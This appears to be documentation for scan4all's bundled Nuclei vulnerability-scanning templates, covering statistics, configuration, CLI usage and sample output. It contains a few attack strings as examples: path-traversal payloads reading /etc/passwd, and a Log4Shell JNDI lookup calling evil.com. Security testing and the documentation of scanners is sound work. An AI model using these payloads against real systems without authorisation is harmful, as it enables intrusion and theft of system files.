
Overview

scan4all integrates Nuclei templates with 3,922 YAML files across 281 directories, providing extensive vulnerability detection capabilities. The embedded templates are automatically available without additional configuration.

Template Statistics

By Category (Top 10)

CVE Templates

1,430 templates covering known CVE vulnerabilities

Panel Detection

655 templates for exposed admin panels and interfaces

Exploit-DB

563 templates ported from Exploit-DB

LFI Detection

509 templates for local file inclusion vulnerabilities

By Severity

| Severity | Count | Description |
|----------|-------|-------------|
| Info | 1,474 | Informational findings, configuration issues |
| High | 1,009 | High-severity vulnerabilities |
| Medium | 818 | Medium-risk security issues |
| Critical | 478 | Critical vulnerabilities requiring immediate action |
| Low | 225 | Low-severity issues |
| Unknown | 11 | Uncategorized findings |

By Protocol Type

HTTP

3,858 templates for web application testing

File

76 templates for file-based detection

Network

51 templates for network protocol testing

DNS

17 templates for DNS-based detection

Template Organization

Directory Structure (Top 10)

nuclei-templates/
├── cves/              # 1,407 CVE-specific templates
├── exposed-panels/    # 662 admin panel detection
├── vulnerabilities/   # 509 general vulnerabilities
├── technologies/      # 282 technology detection
├── exposures/         # 275 information disclosure
├── misconfiguration/  # 237 configuration issues
├── token-spray/       # 230 token bruteforce
├── workflows/         # 189 multi-step workflows
├── default-logins/    # 103 default credential checks
└── file/              # 76 file-based checks

Top Contributors

| Author | Templates | Notable Work |
|--------|-----------|--------------|
| daffainfo | 631 | CVE research and panel detection |
| dhiyaneshdk | 584 | Comprehensive vulnerability coverage |
| pikpikcu | 329 | Web application security |
| pdteam | 269 | ProjectDiscovery core templates |
| geeknik | 187 | Fuzzing and edge cases |
| dwisiswant0 | 169 | Modern web vulnerabilities |
| 0x_akoko | 165 | Information disclosure |
| princechaddha | 151 | Cloud security |
| ritikchaddha | 137 | API security |
| pussycat0x | 133 | WordPress security |

Nuclei templates covering known Common Vulnerabilities and Exposures:
  • CVE-2021 Focus: 352 templates for 2021 vulnerabilities
  • Historical CVEs: Coverage from 2010-present
  • Critical RCEs: Log4Shell, Spring4Shell, ProxyShell
  • Auth Bypass: Authentication mechanism vulnerabilities
  • Data Leaks: Information disclosure CVEs

Example: CVE Detection

id: CVE-2021-44228-log4j
info:
  name: Apache Log4j RCE
  severity: critical
  tags: cve,cve2021,rce,log4j

Detection of exposed administrative interfaces:
  • Admin login pages
  • Database management interfaces (phpMyAdmin, Adminer)
  • Monitoring dashboards (Grafana, Kibana)
  • Container management (Docker, Kubernetes)
  • Network devices (routers, switches, firewalls)

Common panels detected:
  • Jenkins
  • GitLab
  • WordPress admin
  • Tomcat Manager
  • Weblogic Console

Comprehensive WordPress security testing:
  • Core vulnerabilities: 419 templates
  • Plugin vulnerabilities: 316 templates
  • Theme vulnerabilities
  • Configuration issues
  • Default installations

Coverage includes:
  • Authentication bypass
  • SQL injection in plugins
  • File upload vulnerabilities
  • XSS in themes
  • XML-RPC abuse

Local file inclusion and directory traversal detection:
  • Classic LFI patterns
  • Path traversal variations
  • Filter bypass techniques
  • Log poisoning vectors
  • Configuration file access

Example: LFI Template

path:
  - "{{BaseURL}}/download?file=../../../../etc/passwd"
  - "{{BaseURL}}/view?page=....//....//etc/passwd"

Cross-site scripting vulnerability templates:
  • Reflected XSS
  • Stored XSS
  • DOM-based XSS
  • Filter bypass techniques
  • Framework-specific XSS

Embedded Templates

scan4all embeds Nuclei templates directly in the binary:
  1. Auto-Loading - Templates are automatically loaded at runtime, no external files needed
  2. Version Control - Embedded templates ensure consistent scanning across different environments
  3. No Updates Required - Templates are bundled with each scan4all release

Configuration

Enable Nuclei Templates

# Enable nuclei template execution
export enableNuclei=true
./scan4all -host target.com

Filter by Severity

# Only run critical and high severity templates
enableNuclei=true ./scan4all -host target.com -severity critical,high

Filter by Tags

# Only run CVE-related templates
enableNuclei=true ./scan4all -host target.com -tags cve,rce

Template Execution Flow

Customization

Custom Nuclei Config

Create config/config.json with Nuclei-specific settings:
{
  "nuclei": {
    "enabled": true,
    "severity": ["critical", "high", "medium"],
    "tags": [],
    "excludeTags": ["dos"],
    "timeout": 5,
    "retries": 1,
    "rateLimit": 150,
    "bulkSize": 25,
    "templateThreads": 25
  }
}

Template Configuration Options

| Option | Description | Default |
|--------|-------------|---------|
| severity | Filter by severity level | all |
| tags | Include specific tags | all |
| excludeTags | Exclude specific tags | none |
| timeout | Template execution timeout (seconds) | 5 |
| retries | Number of retries on failure | 1 |
| rateLimit | Requests per second | 150 |
| bulkSize | Concurrent template execution | 25 |
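
A pre-flight check for the config file described above, added here as an example and not part of scan4all. It assumes the key names from the page's config/config.json sample and the severity names from the "By Severity" table; the rate cap and the required "dos" exclusion are a hypothetical local policy.

```python
import json

# Keys and values as shown in the page's config/config.json example.
KNOWN_KEYS = {"enabled", "severity", "tags", "excludeTags", "timeout",
              "retries", "rateLimit", "bulkSize", "templateThreads"}
SEVERITIES = {"info", "low", "medium", "high", "critical", "unknown"}
PAGE_CONFIG = """{"nuclei": {"enabled": true,
  "severity": ["critical", "high", "medium"], "tags": [],
  "excludeTags": ["dos"], "timeout": 5, "retries": 1,
  "rateLimit": 150, "bulkSize": 25, "templateThreads": 25}}"""


def lint_nuclei_config(raw, max_rate=150, required_excludes=("dos",)):
    """List problems in the "nuclei" section before a scan is launched.

    max_rate and required_excludes are a hypothetical local policy,
    not scan4all behaviour.
    """
    try:
        section = json.loads(raw).get("nuclei")
    except (json.JSONDecodeError, AttributeError) as exc:
        return [f"config is not a JSON object: {exc}"]
    if not isinstance(section, dict):
        return ['missing "nuclei" object']

    problems = [f"unknown key: {k}" for k in sorted(set(section) - KNOWN_KEYS)]
    lists = {}
    for key in ("severity", "tags", "excludeTags"):
        lists[key] = section.get(key, [])
        if not isinstance(lists[key], list):
            problems.append(f"{key} must be a list")
            lists[key] = []
    for level in lists["severity"]:
        if not isinstance(level, str) or level not in SEVERITIES:
            problems.append(f"unknown severity: {level}")
    for key, minimum in (("timeout", 1), ("retries", 0), ("rateLimit", 1),
                         ("bulkSize", 1), ("templateThreads", 1)):
        value = section.get(key, minimum)
        if type(value) is not int or value < minimum:
            problems.append(f"{key} must be an integer >= {minimum}")
        elif key == "rateLimit" and value > max_rate:
            problems.append(f"rateLimit {value} exceeds policy cap {max_rate}")
    for tag in required_excludes:
        if tag not in lists["excludeTags"]:
            problems.append(f"excludeTags should include {tag!r}")
    return problems
```

An empty list means the file passes; run it in CI or a wrapper script so a scan never starts with a config that drops the "dos" exclusion or raises the request rate.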

Output Examples

Critical CVE Detection

[CVE-2021-44228][critical] Apache Log4j RCE
  [http] http://target.com/
  [matched] ${jndi:ldap://evil.com/a}
  [timestamp] 2024-03-05T10:30:45Z

Exposed Panel Detection

[exposed-panel][info] Jenkins Dashboard Detected
  [http] http://target.com:8080/
  [matched] Jenkins Dashboard
  [severity] info
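
To route findings into a ticket queue, the bracketed layout shown above can be parsed and ranked. This is an added example, not scan4all code; it assumes reports follow exactly the layout of the two samples on this page, and the sample text below is constructed from them.

```python
import re

# Constructed sample in the layout shown under "Output Examples" (not real scan data).
SAMPLE = """\
[exposed-panel][info] Jenkins Dashboard Detected
  [http] http://target.com:8080/
  [matched] Jenkins Dashboard
  [severity] info

[CVE-2021-44228][critical] Apache Log4j RCE
  [http] http://target.com/
  [matched] ${jndi:ldap://evil.com/a}
  [timestamp] 2024-03-05T10:30:45Z
"""

# Severity names from the "By Severity" table, most urgent first.
SEVERITY_ORDER = ["critical", "high", "medium", "low", "info", "unknown"]

HEADER = re.compile(r"^\[([^\]]+)\]\[([a-z]+)\]\s+(.*)$")
FIELD = re.compile(r"^\s+\[([a-z]+)\]\s+(.*)$")


def parse_findings(text):
    """Turn the bracketed report layout into a list of dicts."""
    findings, current = [], None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            template_id, severity, name = header.groups()
            if severity not in SEVERITY_ORDER:
                severity = "unknown"  # never drop a finding over a bad label
            current = {"id": template_id, "severity": severity, "name": name}
            findings.append(current)
            continue
        field = FIELD.match(line)
        if field and current is not None:
            key, value = field.groups()
            # The header severity is authoritative; keep other fields verbatim.
            if key != "severity":
                current[key] = value
    return findings


def triage(findings, minimum="high"):
    """Return findings at or above `minimum`, most severe first."""
    cutoff = SEVERITY_ORDER.index(minimum)
    ranked = sorted(findings, key=lambda f: SEVERITY_ORDER.index(f["severity"]))
    return [f for f in ranked if SEVERITY_ORDER.index(f["severity"]) <= cutoff]
```

`triage(parse_findings(report_text))` returns only critical and high findings; pass `minimum="info"` to keep exposed-panel results for inventory review.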

Performance Optimization

Rate Limiting

Default: 150 requests/second to prevent overwhelming targets

Bulk Execution

Execute 25 templates concurrently for faster scanning

Request Caching

Cache HTTP responses to avoid duplicate requests

Smart Filtering

Only load templates matching detected technologies

Integration with Other POC Systems

scan4all executes POCs in optimal order:
  1. Go POCs - Fastest, executed first for critical vulns
  2. YAML POCs - xray templates for web apps
  3. Nuclei Templates - Comprehensive coverage last
This layered approach ensures critical vulnerabilities are detected quickly while maintaining comprehensive coverage.

Best Practices

Start with critical/high severity templates to identify serious issues quickly:

enableNuclei=true ./scan4all -host target.com -severity critical,high

Use tags to focus on specific vulnerability types:

enableNuclei=true ./scan4all -host target.com -tags cve2021,rce

Adjust rate limits based on target capacity:

# Slower scan for sensitive targets
enableNuclei=true ./scan4all -host target.com -rate-limit 50

Store results in Elasticsearch for analysis:

enableNuclei=true ./scan4all -host target.com -es-url http://localhost:9200

Troubleshooting

If nuclei templates are not executing, ensure enableNuclei=true is set.

Common Issues

| Issue | Solution |
|-------|----------|
| No results | Verify enableNuclei=true is set |
| Slow execution | Reduce rate limit or bulk size |
| False positives | Use severity filtering |
| Missing templates | Update scan4all to latest version |
